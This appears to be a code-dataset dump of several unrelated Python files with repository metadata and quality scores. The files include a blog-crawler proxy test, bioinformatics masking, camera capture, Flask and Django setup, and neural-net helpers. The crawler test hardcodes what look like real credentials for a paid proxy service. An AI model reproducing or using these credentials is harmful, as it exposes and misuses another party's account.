hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb7fc096b934fb70ce80d9b25b9920992168492e | 824 | py | Python | python-CSDN博客爬虫/CSDN_article/csdn/test.py | wangchuanli001/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 12 | 2019-12-07T01:44:55.000Z | 2022-01-27T14:13:30.000Z | python-CSDN博客爬虫/CSDN_article/csdn/test.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 23 | 2020-05-23T03:56:33.000Z | 2022-02-28T07:54:45.000Z | python-CSDN博客爬虫/CSDN_article/csdn/test.py | hujiese/Project-experience | b563c5c3afc07c913c2e1fd25dff41c70533f8de | [
"Apache-2.0"
] | 7 | 2019-12-20T04:48:56.000Z | 2021-11-19T02:23:45.000Z | import random
import MySQLdb
import requests
# -*- coding: utf-8 -*-
# Target page to fetch
targetUrl = "https://blog.csdn.net/wang978252321/article/details/95489446"
# targetUrl = "http://proxy.abuyun.com/switch-ip"
# targetUrl = "http://proxy.abuyun.com/current-ip"
# Proxy server
proxyHost = "http-dyn.abuyun.com"
proxyPort = "9020"
# Proxy tunnel authentication credentials
proxyUser = "HP48W550C1X873PD"
proxyPass = "FED1B0BB31CE94A3"
proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
"host": proxyHost,
"port": proxyPort,
"user": proxyUser,
"pass": proxyPass,
}
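# The %-formatting above yields a proxy URL of the form
# "http://<user>:<pass>@<host>:<port>", e.g. with placeholder credentials:
# http://USER:PASS@http-dyn.abuyun.com:9020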
proxies = {
"http": proxyMeta,
"https": proxyMeta,
}
resp = requests.get(targetUrl, proxies=proxies)
print(proxyMeta)
print(resp.status_code)
# print(resp.text)
with open("proxy_test.txt", 'a', encoding='utf-8') as fo:
    fo.write(proxyMeta)
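# A minimal retry sketch (illustrative only, not part of the original script):
# dynamic proxy tunnels drop connections now and then, so a crawler would
# usually retry with a timeout, e.g.:
# for attempt in range(3):
#     try:
#         resp = requests.get(targetUrl, proxies=proxies, timeout=10)
#         break
#     except requests.RequestException:
#         continue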
| 19.619048 | 74 | 0.684466 | 100 | 824 | 5.62 | 0.54 | 0.048043 | 0.042705 | 0.085409 | 0.096085 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054775 | 0.135922 | 824 | 41 | 75 | 20.097561 | 0.734551 | 0.196602 | 0 | 0.08 | 0 | 0 | 0.308869 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.12 | 0.16 | 0 | 0.16 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cb80caec425effb53efd7354ad0dff729134141a | 803 | py | Python | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | null | null | null | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | 2 | 2019-10-01T07:31:06.000Z | 2020-10-29T15:53:39.000Z | setup.py | codecov/tornpsql | 6d24b20db6ba554064edd747febeea5028bd2e84 | [
"Apache-2.0"
] | 3 | 2020-08-27T00:03:18.000Z | 2021-05-30T02:04:57.000Z | from setuptools import setup
setup(name='tornpsql',
version='2.1.5',
description="PostgreSQL handler for Tornado Web",
long_description="",
classifiers=["Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 2.7",
"Programming Language :: SQL",
"Topic :: Database"],
keywords='tornado psql postgres postgresql sql',
author='Steve Peak',
author_email='steve@stevepeak.net',
url='https://github.com/stevepeak/tornpsql',
license='Apache v2.0',
packages=['tornpsql'],
include_package_data=True,
zip_safe=True,
install_requires=["psycopg2>=2.5.2"],
entry_points="")
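# Packaging note (standard setuptools workflow, not part of this file): a
# project with this setup.py is typically installed with "pip install ." or
# built for distribution with "python setup.py sdist".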
| 36.5 | 72 | 0.597758 | 82 | 803 | 5.768293 | 0.743902 | 0.080338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020443 | 0.268991 | 803 | 21 | 73 | 38.238095 | 0.785349 | 0 | 0 | 0 | 0 | 0 | 0.444583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb811398470b8cc79c6cd844862ffc7058f5bb1b | 7,392 | py | Python | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | workflow/scripts/mask-contigs.py | AKBrueggemann/snakemake-workflow-sars-cov2 | e4cfe0f2f93efc6b45ede0183070bff81f08f502 | [
"BSD-2-Clause"
] | null | null | null | # Copyright 2021 Thomas Battenfeld, Alexander Thomas, Johannes Köster.
# Licensed under the GNU GPLv3 license (https://opensource.org/licenses/GPL-3.0)
# This file may not be copied, modified, or distributed
# except according to those terms.
import sys
sys.stderr = open(snakemake.log[0], "w")
import pysam
def extract_coverage_and_mask(
bamfile_path: str,
sequence_path: str,
masked_sequence_path: str,
coverage_path: str,
min_coverage: int,
min_allele: float,
coverage_header: str = "#CHROM\tPOS\tCoverage\n",
) -> None:
"""Masks positions below a certain coverage with "N". Outputs the coverage per position in a separate file.
Args:
bamfile_path (str): Path to bamfile (.bam)
sequence_path (str): Path to sequence (.fasta)
        masked_sequence_path (str): Path to write masked sequence to (.fasta)
        coverage_path (str): Path to write coverage per position to (.txt)
        min_coverage (int): Minimal coverage required at a position. Below this, the base is masked with "N".
        min_allele (float): Minimal allele frequency of the reference base. If not reached, the base is masked.
coverage_header (str, optional): Content of the header in the coverage file. Defaults to "#CHROM\tPOS\tCoverage\n".
Raises:
ValueError: if sequence contains more than one reference / contig.
"""
# source: https://www.bioinformatics.org/sms/iupac.html
IUPAC = {
"R": ["A", "G"],
"Y": ["C", "T"],
"S": ["G", "C"],
"W": ["A", "T"],
"K": ["G", "T"],
"M": ["A", "C"],
"B": ["C", "G", "T"],
"D": ["A", "G", "T"],
"H": ["A", "C", "T"],
"V": ["A", "C", "G"],
"N": ["A", "C", "T", "G"],
}
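    # Example of the intended lookup (values straight from the table above):
    # reads showing exactly the sorted base set ["A", "G"] at a position map
    # to the ambiguity code "R".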
# sort iupac for later matching
for key, values in IUPAC.items():
IUPAC[key] = sorted(values)
# context managers for bamfile reader, sequence reader and coverage writer
with pysam.AlignmentFile(bamfile_path, "rb") as bamfile, open(
sequence_path
) as sequence_handle, open(coverage_path, "w") as coverage:
# get sequence(s) in fasta file
# TODO replace FASTA parsing with pysam code
sequence_dict = {}
for line in sequence_handle:
line = line.strip()
if line.startswith(">"):
key = line
sequence_dict[key] = ""
else:
sequence_dict[key] += line
if len(sequence_dict.keys()) > 1:
raise ValueError("Sequence contains more than one contig.")
# convert sequence string to list of characters so that we can change characters
sequence = list(list(sequence_dict.values())[0])
# write header of coverage file
if len(coverage_header) > 0:
coverage.write(coverage_header)
# pileup reads per position
for pileupcolumn in bamfile.pileup(ignore_overlaps=False):
# write name, pos and coverage to coverage file
coverage.write(
"%s\t%s\t%s\n"
% (
pileupcolumn.reference_name,
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
)
)
            # check if there is enough coverage at position
if pileupcolumn.nsegments < min_coverage:
# log the masking
print(
"Coverage of base %s at pos. %s = %s. Masking with N."
% (
sequence[pileupcolumn.reference_pos],
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
),
file=sys.stderr,
)
# mask the position
sequence[pileupcolumn.reference_pos] = "N"
# check Allele frequency of base
else:
                # count each base observed in the reads at this pileup column
pileupread_base_count = {}
for pileupread in pileupcolumn.pileups:
if not pileupread.is_del and not pileupread.is_refskip:
read_base = pileupread.alignment.query_sequence[
pileupread.query_position
]
if read_base not in pileupread_base_count.keys():
pileupread_base_count[read_base] = 1
else:
pileupread_base_count[read_base] += 1
                # calculate the allele frequency of the reference base
                try:
                    base_allel_freq = (
                        pileupread_base_count[sequence[pileupcolumn.reference_pos]]
                        / pileupcolumn.nsegments
                    )
                except (KeyError, ZeroDivisionError):
                    base_allel_freq = 0
                # if allele frequency is lower than threshold, then
if base_allel_freq < min_allele:
bases = sorted(list(pileupread_base_count.keys()))
                    # mask base with corresponding IUPAC code
if len(bases) > 1:
for key, values in IUPAC.items():
if values == bases:
iupac_mask = key
break
                    # only a single base observed: mask it with "N"
else:
iupac_mask = "N"
                    # log when masking occurs
                    print(
                        "Coverage of base %s at pos. %s = %s with allele frequency = %s. Bases in reads: %s. Masking with %s."
% (
sequence[pileupcolumn.reference_pos],
pileupcolumn.reference_pos,
pileupcolumn.nsegments,
base_allel_freq,
pileupread_base_count,
iupac_mask,
),
file=sys.stderr,
)
sequence[pileupcolumn.reference_pos] = iupac_mask
# join list of characters to sequence
sequence = "".join(sequence)
    # TODO replace this mess with clearer code
header = list(sequence_dict.keys())[0].split(".")[0] + "\n"
# write masked fasta file
with open(masked_sequence_path, "w") as w:
print(header, file=w)
print(sequence, file=w)
if __name__ == "__main__":
extract_coverage_and_mask(
snakemake.input.bamfile,
snakemake.input.sequence,
snakemake.output.masked_sequence,
snakemake.output.coverage,
snakemake.params.min_coverage,
snakemake.params.min_allele,
)
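    # Outside of Snakemake, a hypothetical direct call would look like this
    # (paths and thresholds are illustrative; argument order follows the
    # function signature above):
    # extract_coverage_and_mask("sample.bam", "ref.fasta", "masked.fasta",
    #                           "coverage.txt", min_coverage=10, min_allele=0.9)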
| 37.145729 | 125 | 0.540449 | 796 | 7,392 | 4.898241 | 0.257538 | 0.048474 | 0.049243 | 0.055399 | 0.294947 | 0.239292 | 0.196204 | 0.196204 | 0.196204 | 0.142857 | 0 | 0.005975 | 0.366071 | 7,392 | 198 | 126 | 37.333333 | 0.826078 | 0.120536 | 0 | 0.216418 | 0 | 0.029851 | 0.121517 | 0.004056 | 0 | 0 | 0 | 0.005051 | 0 | 0 | null | null | 0 | 0.007463 | null | null | 0.029851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb81a1e07f6c274ad26ad849f859995ac2573b0c | 638 | py | Python | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 114 | 2018-03-19T14:45:22.000Z | 2022-02-07T20:42:28.000Z | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 7 | 2018-05-04T13:35:20.000Z | 2022-02-10T12:03:46.000Z | prototyper/build/stages/wsgi_app.py | vitalik/django-prototyper | 0bf7b2437c45868d2ee90c7c4d69c7d71247c978 | [
"MIT"
] | 8 | 2018-06-25T08:09:06.000Z | 2022-02-07T20:42:36.000Z | from ..base import BuildStage
from pathlib import Path
TPL = """\"\"\"
WSGI config for {0} project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
\"\"\"
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{0}")
application = get_wsgi_application()
"""
class WsgiStage(BuildStage):
def run(self):
wsgi_py = Path(self.build.settings_pckg_path) / 'wsgi.py'
wsgi_py.write_text(TPL.format(self.settings_module('settings')))
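        # Illustrative outcome (project name assumed): for a settings package
        # "mysite", this writes wsgi.py into that package, with
        # DJANGO_SETTINGS_MODULE defaulting to whatever
        # self.settings_module('settings') returns.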
| 23.62963 | 78 | 0.730408 | 90 | 638 | 5.044444 | 0.611111 | 0.039648 | 0.079295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00726 | 0.136364 | 638 | 26 | 79 | 24.538462 | 0.816697 | 0 | 0 | 0 | 0 | 0 | 0.619122 | 0.10815 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb82a4817e12d6d4179e7cddccb7eec72aa3842a | 399 | py | Python | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | null | null | null | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | 2 | 2021-03-31T19:48:34.000Z | 2021-12-13T20:48:54.000Z | tests/test_http_api.py | b2wads/baas-transfer | ce2b62c2bed3a06ec85faf1e30fa86d12ede6fea | [
"BSD-3-Clause"
] | 1 | 2020-03-16T15:10:22.000Z | 2020-03-16T15:10:22.000Z | from aioresponses import aioresponses
from asynctest import TestCase
from asyncworker.testing import HttpClientContext
from baas.api import app
class TransferAPITest(TestCase):
async def test_health(self):
async with HttpClientContext(app) as client:
resp = await client.get("/health")
data = await resp.json()
self.assertEqual({"OK": True}, data)
| 28.5 | 52 | 0.701754 | 46 | 399 | 6.065217 | 0.630435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.220551 | 399 | 13 | 53 | 30.692308 | 0.897106 | 0 | 0 | 0 | 0 | 0 | 0.022556 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0 | false | 0 | 0.4 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cb8782c8d3ed5f70ac8e8fb4474a4810fb8ff2aa | 1,276 | py | Python | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | 2 | 2018-01-15T14:38:35.000Z | 2018-03-04T10:00:28.000Z | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | null | null | null | cvisionlib/camfeed.py | methusael13/cvision | 4f147cd91bf43704662fe32960e6c98057ef5eac | [
"MIT"
] | null | null | null | '''
Author: Methusael Murmu
Module implementing parallel Camera I/O feed
'''
import cv2
from threading import Thread
class CameraFeedException(Exception):
    def __init__(self, src, msg=None):
        if msg is None:
            msg = 'Unable to open camera device: %d' % src
        super(CameraFeedException, self).__init__(msg)
class CameraFeed:
def __init__(self, src = 0):
self.__stream = cv2.VideoCapture(src)
if not self.__stream.isOpened():
raise CameraFeedException(src)
self.__active = True
self.__ret, self.__frame = self.__stream.read()
self.__cam_thread = None
@property
def stream(self):
return self.__stream
def read(self):
return self.__ret, self.__frame
def start(self):
if self.__cam_thread is None:
self.__cam_thread = Thread(target = self.update)
self.__cam_thread.start()
def update(self):
while True:
self.__ret, self.__frame = self.__stream.read()
if not self.__active:
break
def stop(self):
self.__active = False
    def release(self):
        # wait for the capture thread to finish (stop() should be called first)
        if self.__cam_thread is not None:
            self.__cam_thread.join()
        self.__stream.release()
        self.__cam_thread = None
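# A minimal usage sketch (camera index 0 assumed):
# feed = CameraFeed(0)
# feed.start()
# ret, frame = feed.read()
# feed.stop()
# feed.release()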
| 25.019608 | 60 | 0.61442 | 151 | 1,276 | 4.788079 | 0.377483 | 0.082988 | 0.107884 | 0.06639 | 0.094053 | 0.094053 | 0.094053 | 0.094053 | 0 | 0 | 0 | 0.003322 | 0.29232 | 1,276 | 50 | 61 | 25.52 | 0.797342 | 0.053292 | 0 | 0.114286 | 0 | 0 | 0.026846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.228571 | false | 0.028571 | 0.057143 | 0.057143 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb905a1474b77d18994505f88c59914d489cc249 | 512 | py | Python | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 19 | 2017-08-06T06:30:21.000Z | 2021-11-02T10:37:48.000Z | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 1 | 2017-08-06T11:44:10.000Z | 2017-08-06T11:44:10.000Z | verify_package_installs.py | lukassnoek/ICON2017_MVPA | 89af3be9b9565cd8a9f6be940edb1c870b5a1c9d | [
"MIT"
] | 6 | 2017-08-06T07:08:12.000Z | 2020-06-04T09:22:28.000Z | import warnings
import os
from importlib import import_module
packages = ['sklearn', 'nibabel', 'numpy',
'matplotlib', 'skbold', 'niwidgets', 'scipy']
warnings.filterwarnings("ignore")
for package in packages:
try:
import_module(package)
        print('%s was successfully installed!' % package)
except ImportError:
print('\nCould not find package %s' % package)
cmd = "pip install %s" % package
print('Install %s using the command: %s\n' % (package, cmd))
| 26.947368 | 68 | 0.642578 | 58 | 512 | 5.637931 | 0.637931 | 0.073395 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232422 | 512 | 18 | 69 | 28.444444 | 0.832061 | 0 | 0 | 0 | 0 | 0 | 0.310547 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.357143 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
cb91cfb48f8d827ab0cbcfd61e22339fb73c61b6 | 296 | py | Python | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | python_practice/decorators.py | vishalvb/practice | 4c38f863408c91aa072bd20510f098043fecd043 | [
"MIT"
] | null | null | null | #decorators
def decorator(myfunc):
def wrapper(*args):
return myfunc(*args)
return wrapper
@decorator
def display():
print('display function')
@decorator
def info(name, age):
print('name is {} and age is {}'.format(name,age))
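# Note: the @decorator syntax above is shorthand for info = decorator(info).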
info('john', 23)
#hi = decorator(display)
#hi()
display() | 14.095238 | 51 | 0.682432 | 40 | 296 | 5.05 | 0.475 | 0.09901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007937 | 0.148649 | 296 | 21 | 52 | 14.095238 | 0.793651 | 0.125 | 0 | 0.166667 | 0 | 0 | 0.171206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.083333 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb930e85278de85a62b2b49b52741474d0c750b3 | 342 | py | Python | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | null | null | null | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | 7 | 2021-04-02T10:26:34.000Z | 2021-04-03T21:15:37.000Z | old_app/app.py | kelj0/GPGdotgetter | 619ada58598fefbd9a5f33d50a15df7f35996d1e | [
"MIT"
] | null | null | null | from flask import Flask
app = Flask('savedots')
app.config['DATABASE_FILE'] = 'savedots_DB.sqlite'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///savedots_DB.sqlite'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = "CHANGE_ME"
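# NOTE: the secret key is a placeholder; replace it (e.g. via an environment
# variable) before running this app anywhere that matters.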
if __name__ == '__main__':
print("Please run main.py to start server")
exit(1)
| 26.307692 | 70 | 0.736842 | 47 | 342 | 5 | 0.659574 | 0.114894 | 0.13617 | 0.161702 | 0.297872 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 0.003322 | 0.119883 | 342 | 12 | 71 | 28.5 | 0.777409 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0.236842 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cb9357f27908177cf2214963118161546dd6dd87 | 1,765 | py | Python | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | 1 | 2021-07-07T21:11:27.000Z | 2021-07-07T21:11:27.000Z | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | null | null | null | nnet/trans_func.py | Bhumbra/Nnet | aa8a8891d28cb2244668093f90e1909be79314bd | [
"BSD-3-Clause"
] | null | null | null | # Transfer functions and derivatives
# Note _all_ transfer functions and derivatives _must_ accept keyword arguments
# and handle the output keyword argument out=z correctly.
# Gary Bhumbra
import numpy as np
import scipy.special
#-------------------------------------------------------------------------------
"""
def sigval(x, **kwds):
# return 1./(1+exp(-x))
# return 0.5 * np.tanh(0.5*x) + 0.5
z = kwds["out"] if "out" in kwds else np.empty_like(x)
np.multiply(x, 0.5, out=z)
np.tanh(z, out=z)
np.multiply(z, 0.5, out=z)
np.add(z, 0.5, out=z)
return z
"""
sigval = scipy.special.expit
#-------------------------------------------------------------------------------
def sigder(x, **kwds):
#y = sigval(x); return (1.-y)*y
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["val"] if "val" in kwds else sigval(x)
np.subtract(1., y, out=z)
np.multiply(z, y, out=z)
return z
#-------------------------------------------------------------------------------
def ReLU(x, **kwds):
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["ind"] if "ind" in kwds else x < 0
np.copyto(z, x, casting='no')
  z[y] = 0.  # boolean-mask indexing returns a copy, so .fill() on it never touched z
return z
#-------------------------------------------------------------------------------
def ReDU(x, **kwds):
z = kwds["out"] if "out" in kwds else np.empty_like(x)
y = kwds["ind"] if "ind" in kwds else x < 0
z.fill(1.)
  z[y] = 0.  # as in ReLU: assign through the mask; .fill() on the indexed copy was a no-op
return z
#-------------------------------------------------------------------------------
TRANSFER_FUNCTION_DERIVATIVE = {'none': (None, None),
'sigm': (sigval, sigder),
'relu': (ReLU, ReDU)}
#-------------------------------------------------------------------------------
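# Minimal usage sketch (names taken from the lookup table above):
# f, df = TRANSFER_FUNCTION_DERIVATIVE['sigm']
# y = f(np.array([0., 1.]))    # sigmoid values
# dy = df(np.array([0., 1.]))  # sigmoid derivatives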
